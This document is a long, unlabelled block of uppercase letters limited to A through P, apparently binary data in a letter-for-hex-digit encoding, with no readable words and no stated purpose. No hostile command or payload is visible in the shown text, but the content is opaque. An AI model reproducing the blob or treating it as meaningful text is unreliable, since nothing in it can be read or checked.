JMLFDJONKCCCEKBIGABMAPJKANAADLMIMGKJABMPHCGFILNEDPOEJBAAKGDJEGFMHFIJGCMPFPKKLIAFFKMODLFLKPNFGELDNABPAIANAKGLMHBIMPAGPOGAFPDPCGPPAEOHNEBJMKEIGAKFKOMICCIDBPEADDMMAGFGOMNGIOKHGJIMCJMLNBCPPEBKKLHNEFABDNEEEHHJJKOFADPJIOHPHOFJAOBJLEFLMPMMFFIMMOKCOCCNOAPOJBPGAPGOFLCLGCKGBLOPGEGLDPCHHCOKFKDGAOMNBIHKFIIFBLFAHKHHPBGNEAANPLKKCFNHACIBBKAHPMJAOKAJMGCBJMABOMOHBFJDJGBGBCBMOKFNCOCFMDLFGJOBEFHNBHMFDIBAKPNICIBMDHKCNDGGHKGENCLMJIBOBFJFNDDCBDFOGHFDEIIMKLEIONMKLPAGCEFDBDEPDHKBCCIIKFGBGEPDBAAHJAOLGBJAPMEJACJIDMGHJBPGPFAPHFKIKLPDNFPNMPHGHFIMLNFMPFMMGFNGHDGDHANJBFNLMLFJNKDOBPBIOOHCCMDAMJIFOFKAKNDCJNDLDFINJOOBOGDNPHKNBGMJPAIDBBMDGCGNEIAEKDNDBADIKBIIIBOHFMPDDFBLAEILMADCGIEBOKHHMPBNEHKJMCMKFDJMFKGLHNBMBKNOHKOFGNOEGGBHCLCDJFLMINEIMPOHGHHIMFLJKDBMKALCGFPFCOKNJGKLPBFIFPNPLGENOHDCAJKKGLEEILCMGPPKPMJIKDJJAEPOBDGHGLGGPAFKIIFPEPBJCKDJBHKLDHDMFJAPBCFMIDOFNBLNBLBKEOKPHOHIGHHNOLPBIPHLHNBFGCBCDMLPCBDPPMHJHGAMIHIFIFAENLKEADPAEIOCANAGICPPFNCMNFGBAMPAMPMFBMEMADMMJEJMKCGMKAPNKNABLJAMOIPFAIFEGDMOADEDJNGLAKLMGJAKKPJEDNHKKHCNJFAODGHOEONEGMGJFOEOHNEKNJNKCDEKJMHHFLLBOMBHIDAHCHCPKFJHBKNLPEPBIBGKFFENKGEJEJLDBLDIPGODFIMMKBKPOEMAMBBAMGDIPJPANEOB
BLALKIGMPENDODKALGBHHNENGNCPCJCHACBKBKGPEMDGFMNIGJJCGGFGGBBBMBHHHJMNEHKLKLPGGMCIKADHDHLMBJHCAEIMPJDFCBLFCDCMNLOAJMBANGOEHLNOGBEFHAAPMIBGBENEGLLIOHCAJOJMJBMLBNKKBMIMGBPGMJODKJPCOPJNNHJDLKNMKJEDJKHPPHAHIMCODECPEPINOHPDKPBIHDOGCHAMEFPKKLBJPPOBFCAMLFMBIAONNOOCHKMALGOJKKBBEKBLJGJNDBLNJDNMBGIDIPOGNLNOCJJDINDHCLMJMHPICDEGDBHLONKLDKBHAKHKFEHIPHLADKCOPHKEOFGEJGJFMPLNPINKHELHIMBJLHFJBCHKHIBDIDLJKKFKNOBOOKEJPFGKEKKPMAADIHEFMAHBKOBDGHKCDGNAKMFNGDKHMFPJJLIJPNEFGFMNKJOOKAPDNOKIPKCELAFLPDLAHCCICAHAELECCLPKAPJAJDAOOPKCFHBHGLFNOOMKCGDJONFAKDENGOLBMOOEFCCOJDIAAPJLBFMCEKBOGOMGJJLBONOLFINEHJEGLKLLIEELELNGJPEDEOICMELEDMGIGBCABJKNONFMJBFLOCKLLFFMPMOEMFGEBHKLKLPADCPBKDFCBODGFNOANOPGHDANCOFKOPICBDAPIDBGNGMFODINGOJDFLNCKCCNECLBOHHFGDPFIMPOECHOKDOANDBLHLGKEINHOBDGFOHHCJKLJALOOHBDFHPJOONBPLNNDBJAIEGNGJEFJNAFAJGLNAGAENMEGDMIAHGJLPELCJODCGHIEIADLHKJMDNEBBCLBJJEFNLMPAEKPCJMGGNHKDBJFGHAINDPDGBHDBGONCHNBEKGNIGDLHEGPCIFAGIHIJPLDDJCHMNGHFOOIGFOLKKELPKHAOMGPBKHIJALFHDDAGHMIMGINBLPFBGNCPECKNPEHENPAGCCAANCPPHLDCPJJJEPAHAEDOPACGGOBLBJEHAADIKFKONMOIAGGIPACMADHEHLDLDCJPABMAACPAHFEBCIBMCADJELANPJGFGOBIMOFANKCNHDJHBEOPCAJGJCHPIOKHDHEEKADKGONNLMIKBBDCJBPBKJHFJPDFONLMABFPPEEEHEHEACLKBKHAOFHAHDGFPFOMHODGDOFLOENOLHNMDMEKPNIHCKKGODLGEOOOMDKPGKFKBEJGPHAKBEIJPEIEJOEEFLIDHDGILLJPMDJNNOAILHPHCBFCGKIJHPKPJBHNLFHJKLAPOLNIMGAJALGAOABNJBFKIKFLMKFLGBKNDBMGEJNNNMPHPIEPGDDAKJKDGDKOPIDLMJAAHNBCLHHPHLAKFEJLOKJKDAEMDAEHFCHEACLDBOFPMBAOMMDGPFGACEMHMJFLPPIEPKNAIOFDKCAKOLOLDGDGAHFJPCIEMPEOEOENOIGOLPAMBAJEEAJNAILBFLKHBFPFHPBJJOOHLNENJKGJCIJFJFMAKDFCNCODIJICMONOICADKKNNDJFFIHGBDIPPLDGCPPOBBPNDKJLBGFAJMOGNHDHMBLIANEOOAPPNAJDBGICBIDLIOIDFHNDFCKGIDLICFDDHLKONFCGKNLFHJCFIHGGELDJPCMLIDMOCEOAMJFNFOHJGNBHGJPNPEGBBNLKAHFILOPIFHHAGPNPIDKJLCNAFMPABKCCNMFDNOFEPFOKBHKAOBALEFNBMEOALCBLEGDAJKKBHMIGIECGMAICOGLKHGLHILANNDGDPJEBPMOEOLEBEEJDEBLMHOLNJBBJMPDJEFAFCEFCHBADHDGDFBFGKKKOFCHGBMIFMPHLPKOECBAOCMOLPCGJBEBNKHKENDPEIFMIJNMGLILNNAOAKHKOPKIIPGGFDGONLANPLONENJLGFPJBANDKLDHNIMLMHHLJIFAPNHIOCHCDBLAAIBINNKBBBJMLPKOIKEAPCMBEDFAABDLAPGHEPPCCMIECPDLJFFO
MCOADJJIMFMGFBEPANIEAEGMJNEIFPFKIMOONIKPPPNENLLOAMPLHJGFHCOCBNAJDAAFLOJENKDGPMMHFBFHPOHPPAACBONLGGJJICDEBILDGEGGCLBFKJKPEABFPGLFNJGNAHPJIGGEKAFELCONEMBMMDBEOEIOILFLOJGHMMCFELACFGKFLDEBOLGJHCHNLIFMIGCBNKBBELJOIHJOBJMBEJEGPAMEFCGONAGALPJHEMFBONEDPHNKPAHMNEHGHEDKIFCJFIEDMCIJIFFDKCBDBGNDHKAINOKJPELPMFLOMJKKMJBHGHFDLKMJLOGJPPEFIDJPIOPJAHKJPJBBJFNIBEFNFBLAEKDMGHPFDMOGMLOAKEJEDFKEJMMCBJJNLNBBDOGDINJJIHOJMLKICDOLCBKGJBBJPMIIFHCLKDHDBGIAKHLDLDJPFOBMBLDCECHOOADMACNBDKDGMMIBLCPBHGLNIIOFICJKILNMGHIMAFFCCGGECIDIMBPGBFMHEPGDPCADLLLPIAMGAHJLFOCFBPCFFKIPLLGMPGMBPIKHPCEOJGMLJBCJAELCHKOJOLFIIFAMHIDNGBNBEELLCJJEMGPHJFICKIEBHLHHGMAHALOGHCLKCOLBDJEADNBFKKGLMFJMBPDDHJLAGAPIKOKMADAMBMLCGMJMFCHBMEKNICHILGKKOENDPNMBBGMOCNBHBHPAMHDNLGMKENEFFFHEKJCAODBFIHIJECCFAKDACJNNCCDBAKPMJHGPDDBLJMEJCJCIJOAAICPOMHJPOEAANLMPEAANPCKBJKBDAMDJAOLCALJOAOEPBEICPBPKMPOHPCDMNKILPGBPPJADABACIKPHHKCAGLGKGHCKOMBIFEODHMCEKFEKOGNLMPGAJFPOLLCHMHNCIONPLFNPDGEFMBGINFLJNECOHLFMGGDGCPMLLCFBBOFLEFCLNANCKGGNBNKHLDOHJNCPLIPPFAPMPCAOBENEKELOKFGJPFOLFDBCBOCGDCONFJFPGBAONGEEGBLJDGIDFLJKNJMHCAMBOPPOLHJOHAIGBDHEGBMMIDJGDPIMAMLGBKKCNEMHFKBMKJGLPHEGOMCANLNPBBMKHFLFEGPCAGLDFDIFEIOJEJDIBBEIOKPGBEACGPJDJOHPABDDLODFDHMIOFHOBGEBKMIFPIIOEMDIIHBMIKNIILNOLHIOAMMEFNBJIKGIFADAMCPKNJGMCJHELDKPPNFNNHIIAJGJHBPGNEHFJBFDDFNNMIJHEBLBFAIALMLKECMGJECBPOKEIIIDGKMANPIFDCFKACBFIANEEFGPJCHHAILDIHKBPCDPNGFIOJJHHMMJEEAEELIGMJEBDLLDOLJGNEHHBAGCIMBFNPHEJNBEIOIGILKABPBACDGDEOKNDBMEJKBILCABLBHHEELJBAOMEKODEPCCDFDIAKMKKODDIFBMHOFEGAIFDPPAOGABHBBCDKGLPBFACMALENJBMPDNBJMGKLLILPJNBGJDBPIJCHNMECDHMCFGHFGECFEIGLNFDFKEIAKAEBDLDEBHBCIJFNEGMPEHDKONBKHACJLIHPHHLOFFKJLEPNBMALKOCPIGAFENIKPIBPNLPEJFLMAGIEIDAGOEOPCGNDNCAOHNBDBFJOJLBLNKPIOEEPFGDGINNCCAIIBCMMCMOJBOIECCAFANOLGPHCICAAJFCAHLAFAKCFHACEHDIBKKMBNENDAIKGGBODBCNMMFHLGCGIBNBLJONGLAPNPJDMOJPCLPBDJIJAMFBBMAAGBKPMDFLLEPNNBFKOINBECIBLLJOLCACODEKLNNEOHIOFEOPJFPOIIFFNPBIBCDKPBPNDIIGHDFPLCNJNCDANGJCKOLIEEPPIFNGLFEKJHFNBFHMFKABCOEKJDEOKGAMBGGDNMIODAEGAFDNEBNACCHFHKAOAHBEBFLELIHICIABHHJPAEKLBEDLMEBLJDMMCEHCILFAHANOGGNFAHEBFEE
AAEENGMDBBLJFEMDEEJJLBOAKDMANBOEFNMOGIOLPPHIAJPOAEEECKMGIPBBOILJKAEEPBKJPAFIGFLHGFADMMMBGCCHMLKNMGBCOLBEPBLAIGMCILHANLPEKKFKECCGBCOOHOEIEIEHCOIKELKJDKOMDLPHHOJMNBKKGKMNPJPJDHGIGHLKEOPHCHJMMELMJJFPHMCFNILJEKPFAHHNIIJKEGCLCPKDPKNJDEPPEOGIOHMPHBLJBHDEMFGFGLGFMBIMAMGBGNOKMLKOCMALKLABKEHCNKHMPECBLFILHJKOPEEMJFKIDLFLBBOHBFAFFDLGNEENCJICEOHCNMEPLDCHDNPPKDAFPDHJAHPAKPLGGDPKKLNLHCGOJBKHCJEJLAOCEGMFLJPGOBMCHILMHHFOAFFKBNFHHMLPBHBCEDMPNOKLNMIELKJGBBLEDFEAGMELGCAKJGACCAEBHMFPGDJLHKHHHDJDDIMJEGJFIPDLELLDDIOKMENJBFPLBLEFPIFMIKLCNNOJHCAAGLHKIBEIKPAHKDJIKDGJFJMBADAHBNLNJDGBPIKFKMMPNDADEBDAPGPACLMCGGFBHBLCGEJADMJINKEIFGBNCEJFELBEPAOFFGLCOBNDOEGPBMEACHCKPPKDKLEBDLCHAPDMMLOJKENOLIBIOHANPOMJDMJKLOEKMCJPBGCGABLGKKDBJJMNNFOCKLGJGFCOHBPMDLLKMIBAPPHBFLPCDAAJHIAGDLJBHEBFDDDIGGDNPIOOGJFDPLLNNKHGPIJLFMMHJECMHKOOODKEFNBFPACPOFAICOJBDGKPPGDFPBDHDCKMNLBLAKPFPDNNIDPLKKPJGEFEGMKCDDFBPOGNDANPDKOLKKJPIHNLEBCEALCDKJFNMCIFNHOECBBDKHNLIJMBHEHMCNKKAOKABMEIDJLFJLFAHOFHDEOOJAFBHKAEDFMABCDCCHOECICOIMJONHNJJJAFPDKNGPDFJPGDCOEIHNNAEOBINGNNONJCADCHNOPBBEIALPHANDDCNFPJJNCHMMCFFPKJNJJDNHMJHODBEEBCFIBPPMBLHLIBPHJAFMINPNCCKJNMMDMBEFICJCHBLKEADPKLGFBNJMFMHLKEMFICDFNBOHJEAEAEGCGEAJDHMJKIADACJKOGAPIIOAKJCIAMHCCEDBGGBCKCHHPJEPOKLMHFGECFJLMKMHNKBEFCJGEFGFCOAFAFBNCAPGCAOLALGAFOCKKHOBOEDJMFNMIEEEMMPDODJIBFGNBCEEFLEBOPAGCOMKPLINMCACMJAMAEOJLKDMPLBAHNOFDGKLHMAEPLIDFLIIDOCGNKBDHMMLALMEABOALDEAJCMGFOMMMMPFFGJEDJACHHLNCLLDMDOKICHDMNJPEFIKDCGJJCFMBEKDBEDEPDIOAAJEGNLCJPPIDFCNMCFNBFLJKNIOPCKMGKKOCLFFBODDGBDMCDLGIOIBANLCPDCJENKGPAOFJEMKHFPNIEPJMOFMMBMECCNKLBCDOEKCAGNKHEHJDJICMPBGPMJBIJEFDAGMHADJAIMPCDJOMCDCOEKDDBDJBGDKCEBIJOIMMMEKPLFKHDONOFMIEHPLPELMOECGNEFPGCCHPNKONOBPOFAEGAMMONPMHGHCAEIICMCBNBEEGEBJHPJBAGPFHCLKKFFCHIBEKPOECKFFFAOFHMIGLONNILPLFJKJJDAPMJNNECPJLEPFLKEPKEDDLGPBNLIPDKIHIKLADFPOONDGIAFLDGIDDDLGBIGIIPOLPFPKGHNLEKKPJLJIKPIFLEMDHHEOMBPBDOOMNCOKMIEEEKGKGKCNAELAMKDPNONGADNKNLHNAKELCNJIPCLHCCCPFHGDBBFIPCHHEEGLFLKFPPDMHAHGGFLJHGCHBGPPPCJELJGNFNAOLHGLELLDHGOIPKMOHDPDJBOKDNBIPHFJJGFFGGAIAIODKHLHIBDDGBNNBDIOPMCKDDIGDMOGHIDNHI
CNDHJLOCNONELNANANABKDLGMBFOFCGAKDEAPFFEMBBHGCDIMBCFDGKDMMHAKLNFFALLDEHIBPOHBIAMPJDJIDLGLIBPNDAFIOKNLIKABFJDHFACGPGPLHDKDCDGFJJIABIMBCIGNDAACEKPCPCPBCEJPGEOOMHLAGEIGKDNEBGDADHAPOLJGJCHKBJCGKJELGCIGPEINJMONICMFOMBIHBEADNAOJMEILAOOFOEBJFIPEOCOFNOMFPGFPGPAOIGCCIPDJPBLAMHNGGKKCKCNJBBAKKLNMPICEJJCLOFCDNCAJCNNCCDHCAFLLKOJKLJAPPMJHIHFMLHPIGFMDEBABCCPIJEKNHEBGKOKFKFDHBCIHKNAHEDFAHCNFANINKOFHIDDNLKLJFOPGKOCKKHMCOGMGMLJGBJNDDIJBNIMKCJJLKDDIDANLDDIOMNLHJLNFHGAOFEMCCACLECHJMAPNMHJHIFMKEBCLDPFGNCDJIIDMJAGEEHELLCGFIKMGFEHFDMHCMIIJJAHCMHGELNFEOLKIFNGADHHMEDFJKAKHOEKJKKENKOIAICCBNAKNDAHCNEIMFMMJLHBCDMPAFKNGMEFEKKFCLNDDGHCLNINNNDEAOJJMGFCFILIOPHPNOPKFFJKAFIGKBHHBPCGONIBGLLPADHKOGNEPPODMMOLHKEFGGFJOKELOMFKBOHBIOEDFOEOODKBAEKBNEFJDHMNPDFALEHFIJDGIFOIOPFFPCKPIFKEEOLCDLNJAJPGENGEGFOEFJNKGLLKDPPHPMBDIFMPKJGCBKFPEFOOGBKBMLPLNJFNFMBOGHHNCIIEANEHKLOKNBDHCOGCKNGEOILHIJDACBPGKKJBEPIMPFEBHGCGAFNLKGBAALODHNDFLPMFDCPCAGDDOCIOAGMFOIPKLEGLCBCNHFOPEGDCEIDFAEKBKDECKIHPBDJIDIDGALCBBPMEPBEENLNHDEJHDHCJBLLMJKCOIMAHKBPIDNKIJGNMJIIDMEKONMACBPBAKKMPAAIODIKKPBIJCMJBHNJENABEMHCAEFAMNFBBBAHKBCAJCCFLCBCIMGOKNLDGNFOENHGOMADLCCFCOIFABGGBKAOBMFOOKCIFFFDEEJAOJKEELDIOFECJGKHHFIIHEEFPPMFEPJDBGAKBDIPPFOOBLLFIJEJOENKDBAHALJHGGHHJMKNKBGAJANOIAACPNJCDPGKADDFEOJHMEAFBPNHHAGMCBMOPDPOHHFIIABBJMGDCDKKJIBCKOJGLPDGEBIDINBCIHFKILFFIDBHJALOKIEAFOKFDMNPJBDEOKMJNNCMJCKPJDMMEPKOPFCFOCPICEOHHKIPFHDAFBPIMJDENMGFMOPLJKEINNHIHEFNMDFAFEIPCLBEGDOJLDAONAJGBPPLKECIFJIFGGEKBIGANDMGLKMJLPCENHHAGGHIKLIIDEJEFGFOBANCFOJDFBOAGFFGLFICHEPDHGMPOOIJBDIMMMNBDDPLCCAMFGBMJHBEBOAJPOGKNGCCMJCLMFLBMHGJMLOIIHAJCFNBGLEMHAOGOAEBDGBJCNJOCCJFPGKJGJLBELGLPJAIJCOGBCIMDOEPDOPLOJNIFKGGBJGJIIEBHIKNJPDHGGPCOMOHFFJJOLMEGPMMCLIKJABCAKAPGJNNMNCAACMNHJFJACKALBGFIHBLGLLKCEGIAADFOGDMLMHIFFKFLCLLJFAPNOMGGIGOGGGIMPPIOLMPOKFMMEIFALLLLDAHBBEICFLGHBNGMEHJAEAIDHMIOPJIOEPHKGBCBAMEPHCNCNOOONGKOKPOLNIJJNFPILKODJOKELGKLAJHAJJCCDNFCNDOPGDILHFPCFDPFNLEJGPBGOJCDKGBKOFEBOEJJKBLIFDMMMMPGPGJOBMNNKEBDCDIOCFJAHCBJNIDKANFLJDEHPMICAGLBHAJBKONFEODPIHGHFNABBJJGKLGLABDNMEMDJIEDAIFBDGKEGEHACPI
OGNJPNKHELAIIPPJFLEDDJFNEMCDOHKKDEIHAFIGDKCFOFFAHJDEBNMDPPABPEDEIMJCOPDBFPLGLMLNCIHKLLGNFGJPAIHACFLEKEBKCCIBCHMNHGAEJCBIKILPEBNJFIHJBBPKCINFKEIMDAGCFCADEABMEABDJBHFJKIMPBGEDDOBIEJFOJBPOKDPKMOADFBGGLBFOLEIMKKGJLEOCGBNPECCJPANAOOIMBPOIKGNAIIMONPOHLIGPFPBKMGDCBGOODFHLBLLJOOBFBLADAPGODGGCNBNLLBHHHLNOHNOOHIMDFAMJKGPNKCFHBAHJDMAIBHDPINLMDMEMGINEIJOABHICCCAPDBEGGCGLCFECNJLILBMFEEHGJLCAFFNBCMGDEHFDFDFMDLKFNPNNNFONILACJMCNEJLCFDFFJIHLCNPOMKLPLBMIIONLFGNLNKCFGDCPLOLOFAMPBOMGKEOEPHMOGGPLPBJLNCKCHJNGJNDLMCNGECDFOEAFOGHEGDOCEHONPBOJJDEJCOMLABGDEMCELJKCIBALONDJCOOIBPOCKHCGPCIKLIIBDNEHNCNGLDOPMPGKFFKMCIEEOAEAEJJCHPIIOHNKCPIFHCNAIBFAANMBLCDDKDCEKDKOFOKKAIJLECJJFIMPHJEDBJGANPHEPDEAALDPNIPABCLAHGLEBDBGLLIBMGKDGDOFAEBFJMDKNPOJJFLHPGCBMCELAKAOBGMCNIKNOLHNNJNBMDGNKCDKMNLMKMEGIPADAJILFEMDNMNIFMCFLLHLIEMNDAMPIIPKLPNLFCNMJNLHDNNDOCMAINBADEMHHOEEFLANPCCALHLIKOGNOANDAGBALJGFNADNMMMIOKDDGIPBMCBLNNGIGOGFIJPKFGENHNHGHPMGIKJANAMNLLILACALHGKDPGIBOJNGMOPDIGMFIAOOCGKONGGMEJHEOJMEEFHABJMEMLIAAOBAHKDNKDCHEEJIMJNJFAGDJINDGHNDPODOLBCKGPJDAJKFONJOLKCLHLHAJKACJNMGHPLNGHKGKNBJIIJOJACJIGLIOGDDJKKHIFAAFFHKILHOJPOIBHEECKMGFJFBLABJEMIPLIEGEKIFOOFGEOAGFAAODIODLPEIHDNEDKAHEINMCCABEFCKMMPELAFMHCAFOGPEPKEIPKHECMJPAOOIMBJAEAKFBENJKFBJINOKNEKCNBFNFDFGAEMGHFGPPFMENFFONFJOIPDHEBCPDCLNPHMMEOBBLDGIDOFPBKMIPGHCPNPJLMJDENIFMALMKMJHCOOAGNCBOLFFLEHFCNFLKAFHGEOLJMEMJAGAFEAEINCGCMHLMONEKLMHGEKCAJHIFOMELLLFHABOJDFMCCJHHFACNMFGIHKADBKMDLNBGLDHIMHMCCEOLPMCNGJLKIEEDLDICKAJKHFHMGJBOJLDOCKMLCEGGEEFCODGHAMFLMHEANHNOFMDPDNCLECNLAKHEJAJDNJHEPNHIKAMECGFPPHDOFIMAJFFBCKNOFLEEMDNOGODGCDBGIFGNPKEFNIEGFBCJLKANKONKDOMGCBKELNONEGFCPADCEBPDEJMGOAEPADAPEHGAFBIDNPOLIGMPCAPEBNCGIIEBFIGDPONHNHICINNNHENMIMHBMMECEKNNABEMMOCDDHCDDEIBMOFNAACKGJFGDPMJNGHGBDKGECJDLGMMGEIJKNKEHBJAKIBJABGCNINKHJEIHBMCACMJPDHNCEBBGOHMJBONLKNBBOGFMIEMJGOENNCBOGOMELKOGCMJAKKHIMDDGGFKHPPMBLAJBONANDMMOENPPFAECNKJPOGCOOIMDIFNDBKPDIBCPDELKPGNMAPLCJKAMANCOHCIBIKHKICECCEEIMCCPOFKFPDEPLKNCCJHCLAMFLFFJPIBFDAEPHEENCGPMDJFJLAFBNFFIAKJDPHMHMIJOLCGOIFPNEJCPEKHHMGDGFCJBBDKAJPIHCGCKBFLLA
PGDGGNBKGLGEONFAKHAMBIDCLIMEIGFBIGMKBNNCJJNNDBLGGCBHGFFJCLDIJLLNLCJBFJBBCIDPOAGKFGJLMHOMLLLHGNONCLDHFOFABDKCHKMPLLIFNDMNCDCLHMJDPBLEKBIFFHJCPAHONHFIINJBCPANHOOPIFIBCIOCHEBKNEDMDDNMLDNGIHPIDNBHMFPBONLNALJLCPKCOCMHDGJEHEFBOOLJIMKPHHDGOANOILAHIJCFLECGCEEINMNCGEAKNEPHIMDIMLOOMEDFLBPPMBNJKLMMILPKKCLHJEFBBHDKPHFLCKOBNJKGBKAIPJDPJMPNAMOMDLBIGKCILNJMNHDEBKLAMBFJBIHBLFACGOOGBFPHNDPBHNMBBCFFFFFOODNDFHOPIIJDNPBJACIJJNHALKFHJBBADGEGNMGBBJGFDKMPLAENENCJENOOALALIIJKDCGMKMILDHOECGIBDCCODHNHOPKIAMGMACICEEEDLAPHJGEMCKCALNFKJINPNOHGAMCOKDICJJAMGDFPIIDONGFFGGKMEGGKKFANCPFIJLANGIIEHDINKHBGMAPBAEJFBGOLBLNGDDNIJLGPMDLFCEMLGFPICJHIEFBIBOONDGDNENIMMDPGEGJFJGDMDMDGBFBFIEHCEKCMJKNDFKFBLJKDKAEBHGPBCONEGGGPFLNNHGIACGDOBLDCCNIBJNLHDKGBKOBDKLKAPGKOEFPIMPFGDALBJIEAANKFBCJBOMMHLDEMGLPFFKMFLMKNEDKGJBFLDNMBIMECAEKGAEAGEICPHELHLFBCFLPGEHILDPEALFLKNNKEBFJKIHDAPBAHBJKLHPMGKKJFDJPJAIBLGILJGJLGGNFJHGCIAGJKFOFAPMJHNGDFOGPLDOLEBFOJFNOHGNOGDLGCNNGGLACENMFNEDEFECLFGJPMDPPMPMGCECEFBBPFDNLEFPLGHLMOAIMAHNLABGDOEENKJANLCANNIHMGCCLGNMJKCHEKICIPPAHDAHFMKBLBGGJALAEECPCLHJBMNBIHGPABFELDEDHLEKMPMNAMELKPCMMHEHGGOHNJCNBEDJLGEKONJADOFKDNGPGNOKCDFCLKLOKJELACBNCPJBGEDGOCEEBCGCCFDFGFOLIDFKOLLAHMIGNMKJFGOFKOECFIBFNILJICNAGFNCMCBKNKOOJGKIPPLDADGNJOEFPFCHMAPOCMHDMHHBIJPLBCOBFDLMONNHJJCPMGBDGBKOKILDGBOIDMDEBCJCHPIFMDLHBLJGLEEEOBODPDOHJDFMJLOLIHFLGPKFOGLPABENOJDCEBGDBOFHOBPDPBBBCPFECLNJOJPINDIMGCBBFPBDEKGLIJFEJNJHFCCHGDFHNCPPIBKIAPHACLIOFKBDELBBEBHPNGBEPLNNICCFIDAKCCAHOBAGBFKLLJEFCMELMDBJNFGINLOPGEEGBECIAJLKILLLBONBGECOIDPJJOLDNFCDINLOEHAEMFKCJCOHKADHIBNDHLLAKHCNIGDFKJHDGFGEPDOFMJNHOGKPAFPGBJPGJBCMDJHHNGNLOIKBBDNKJPKCJKDKHDOOBOHAFCOBCPJPMHFDDIDLHCCBHNBLLGOBICABPNLIKPBBCHNJGICEJIHHCAKJFONPAPCPHHKAHNMKMLGILBCFCBFNDOHHICGMIEBFCKMNIAGEJEAGDILPFCILPGAAPPEAOGNKPABJDHICNGBNFIOGIDMFLNEDLLKLAIPPDIMCGAOOGGCMNFHHAOLLKDHNCFMAPFOBKHKNMEFGLCOILBMAMNLPMGFPBJKMONOLIKIKEGMOFMFHEBCFFDCBIDJMMPPLOBGPHNJNICHMDMKALFLFOGHLBPEIJJHANKBJIKHIKDIBAFJMMIFMDCALKFAEAMDLKKLFMFMFJOLAFFKBFNDGAEBLGMOMPPEPGHFGFBDMACKLKEBJIHPGGHMNIKFABFMANJBMLGCLBJEFDBKCOBHDIDLIAG
CJFHDJIGLNFPEMOEDPHDIKMDHFDELMKMFDDIAMOJFNBBBKKNFCHKDLKLDABODFGGGIDEKDKKBOFMJKCKFDBJJLKIKAHIBLIKIJPAMMKDLOIMPKNNIBJCNCOPLLEGDEBCPMEKCGAJGFEIJJJHJFCMJONDBJANNEAEAOPEEHDLANHGIPDLHNDJLOFCIAGPEPAEOHEJMMBAFLFFKJGNDBJIELPLOPENBDEMMPHHMIEAGHKPDILJIECILEMEFCKJAOEGCOPDBDOCADNDPJDPMNIIICCPKNKFLLJBLGCFHKHHOIGLNGBJFPKMGLJAKKFGGOFOKEOIKECNNMIEDEKAONLDKPIJCHLKOIHMLNAJEDONHBEMFKKMOFLDBBEDMGBJACKNMPFIKHIGMLGIHJPPHPBONONABFOOMAOOAEOFLGHIDJMJMEGICEAGLBBIAPCAEFHCOJNCMFKMABIFJGEDMIOMFBDBBMNKJKJAFGNDPPKLEFPKHPJLMFKMFBAODDBMMKNGHJJDCIJNAPEPOKHGBBNCIIDMJEOIGMDIFAOMOHPLFJGBGAJMJGJJHCBNDJLBOGELHEJLBKMHGPBAKJFLBOEAAEKOOPOPOHJIPAAJPLLHAAPHDNGNOLPPAGCIMLAFPOALDCABFMMKCKKIKHHANIOADOLHJPNENHKMJOIGGNFDPAFPPBACFJEAHDDDMPEFPJPDLPMJLLMAFOMPEANCMKGMGDFEKJDDNEOAFLJILBHDCIKHPHCBGBJJPNAGIOKLKIDAOMMNNEDCCMANNKGKHGPOLFOKBCGAFBNCOEJHKGMHCJAJKNMNFNEDCFLLCLPCMHPPGHCJCGNNMILCANBIGFGPPEMOIKCNOOJEKMOPICMAOCEDIHHDLJFHOIFINOBJPNKOEGJDBBLNPJLJFGHPAEHDLHLLHCCMILAHIBHLIFIFCJFBEALMHMOCHPKGLPGMOMIFEGMGHPMONMCAFMMKPMDPBBLHDNDOOPDFDGOGGGNJIBJFMNIALCFEBDMKONCCCCOJFEGHMHEDNFABDPEOPOKDEKBABODDEKNONMBGFMICGDFFECNAFLALINMEIOMLOKGLCICKOINIKONIMBABDCDEKNBEAENCCFDPIMBFFDMOJBFEBNKGAKFNGJCIFJGOEPEOJEMIMLKCHOLBGHLPJLPHLHNPPLLEFILKHEECKEKPPGFOJPLDBJCLFKHEKGFDMNLCBEAKMBBOGPFHCEEDCIADCFGEMMFKOJMHGGGAHIOGIMMDFFBBJLJNGEHDAHFPKNFJGILEAGHPCPFKIKBOHMNBJDANFHJMAGEAALHBJCEJNADBCOPFGEFNEAEBAKGAFNBKLNHADNEPHEKDJFLCPDAGLJKHBMJCFABNGNDAENDHJHAMGJBKKDFHCJKLACECMIAHDBLHGAOGEKDHMJHDIEPLFIPKCGGFBKHPJCOJEOEPOBEAEICOMLGFOPKFJCPFNDNGBGDDNHEFJAJOGNCHCDKOHKPLMBJOHCJMHGEGOJIJCIFAJJKKBHFNCDLGPAPLKGAKPODICOPJGBCIOCKCFHCKKNLDAHOJDKOKLGMKDHEIFKNBNCGFGGMFMGJCMIDJMPJHCGKOFNJHGMCEJKIOHDHKPBJJHKKMBBPODLDHJPJNFKFPANIKJLCPIGMHKELCNDCKLHKIDEHOPOKLGAJNFLHAPNMJJOILLBGPFIILFPILGGBPGKJODPEOGOJKHGFLOEKPCMIDFKEBENKDMOFKPMKILHLMIDEMAHAFOEOGDGDAOMHBGPCCJAFELLDCDPGAJFADOJIBFEPGIANAIBMLBEJLCEGEEKHJLOIIECFKPPJKDGMBOKAECIGOMMPCBGKFEBDBBLBDOGICIEKHCBOCMAOFOPEBMBDNJEDMNOJAEKFFIGNPJECCPOBDPLPNLEMCALKNAGHEGHKJGDFPMHOPADICFBOCDODPAIMLEDCLFJBLBCGGNNKBBMCGLGKDPBHJGLAKENAHIGCOMJBBKEMJ
MMNENCKNCKPIIPAMFFPNLACNBHPCIDEAJAFPHGGENBGCIGGEJLBADCDMBNLLILBFFNCOMJHLLOHPLKIOBHNJIAHFKBHHJINNJGHNBBGEIGDEDFJAMLPEEIKGONIFBKBGEEKFALAEPDLLLFDEBDEGGABCCHILKOLIJHGGLEMGKDHEELJGHFBLJPHNOMDAOJHEKANHNOGEBLBPOGKLCFAFNFIFBFGCNDADGBEGFFGMHELNFMNPOMMGJPDHPJOHIBEEPNBAPPEKGENLGOEOLEPFDNKEGCANNGNIALLHBJMIHLDKDNCDPDOEHCPFAOHFNNCPHEPLHBOKDCNPAEGEFCIEIPNOOKILJCBLOLJGELBCDGJLLPDFKMOCOMNGKHAHPNLMFDMCLCJCCIFCOAHGBEJAOLACLJAIFKFLAAEDCGDMOKJBJKGLKHGOLOBCLONPANLHHNBKJFMCLACNGFKCKJKEFFKJKMKJJNPECENEAOIGCNEENDKKPCFHAKHNKDLLLGNMFKOKKICHMCMCNFLEIJDIMGHFJCAPIGLDIODLKCOEMMHMGHFKEEIGEALDIJGOBOAHGKGAAEPCCBBBFLCGAPNPCDGCOIAJEANBMCFIPBJDOOMMMAELKEDIBEOCBHGJNNCIEMJANAOCHHABCOLELJJENDMIFDBHEFEJEFGPHOMACBOLOPKIKOG